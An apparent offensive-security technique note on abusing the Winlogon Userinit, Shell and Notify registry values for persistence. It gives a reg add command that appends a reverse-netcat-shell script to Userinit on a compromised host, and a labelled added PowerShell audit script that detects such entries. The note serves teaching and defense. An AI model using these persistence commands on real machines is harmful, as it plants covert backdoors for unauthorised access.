Windows Logon Helper
Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.
Commonly abused Winlogon registry keys and values for persistence are:
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
HKCU can also be replaced with HKLM for system-wide persistence, if you have admin privileges.

Execution

Let's run through the technique abusing the Userinit subkey.
Let's see what's currently held at Userinit:
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v userinit
Let's now add an additional item shell.cmd (a simple reverse netcat shell) to the list that we want to be launched when the compromised machine reboots:
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v userinit /d C:\Windows\system32\userinit.exe,C:\tools\shell.cmd /t reg_sz /f
Rebooting the compromised system executes the c:\tools\shell.cmd, which in turn establishes a reverse shell to the attacking system:
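From the defender's side, the same three locations are what an audit should watch. The script below is an added example, not part of the original page: it reads Userinit and Shell from both hives, splits the comma-separated lists the way the reg add above builds them, and reports every entry that is not the stock default, plus any leftover Notify subkey. The defaults ("C:\Windows\system32\userinit.exe," and "explorer.exe") and the assumption that the per-user key defines neither value on a clean build are mine.

```powershell
# Added audit example (not from the original page). Assumptions: stock defaults are
# Userinit = "C:\Windows\system32\userinit.exe," and Shell = "explorer.exe", and a clean
# HKCU Winlogon key defines neither value. Run in an elevated PowerShell to read HKLM fully.
$Defaults = @{
    Userinit = @('C:\Windows\system32\userinit.exe')
    Shell    = @('explorer.exe')
}

function Get-WinlogonFindings {
    $findings = @()
    foreach ($hive in 'HKLM', 'HKCU') {
        $key = "${hive}:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
        if (-not (Test-Path -Path $key)) { continue }

        $props = Get-ItemProperty -Path $key
        foreach ($name in $Defaults.Keys) {
            $raw = $props.$name
            if ([string]::IsNullOrWhiteSpace($raw)) { continue }

            # The value is a comma-separated list (note the trailing comma in the default);
            # split it, trim whitespace and drop the empty trailing element.
            $entries = $raw -split ',' | ForEach-Object { $_.Trim() } | Where-Object { $_ }
            foreach ($entry in $entries) {
                $isDefault = $Defaults[$name] -contains $entry   # case-insensitive compare
                # Anything under HKCU is a per-user override; under HKLM only extras are reported.
                if ($hive -eq 'HKCU' -or -not $isDefault) {
                    $findings += [pscustomobject]@{
                        Hive   = $hive
                        Value  = $name
                        Entry  = $entry
                        Reason = if ($hive -eq 'HKCU') { 'per-user override' } else { 'non-default entry' }
                    }
                }
            }
        }

        # Notify (Winlogon notification packages) is a legacy subkey; its presence deserves a look.
        if (Test-Path -Path "$key\Notify") {
            $findings += [pscustomobject]@{
                Hive = $hive; Value = 'Notify'; Entry = '(subkey present)'; Reason = 'legacy Notify subkey present'
            }
        }
    }
    return $findings
}

Get-WinlogonFindings | Format-Table -AutoSize
```

Against the reg add shown above this reports a single HKLM Userinit finding for C:\tools\shell.cmd; an empty table means only the defaults are present.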

References

Boot or Logon Autostart Execution: Winlogon Helper DLL, Sub-technique T1547.004 - Enterprise | MITRE ATT&CK®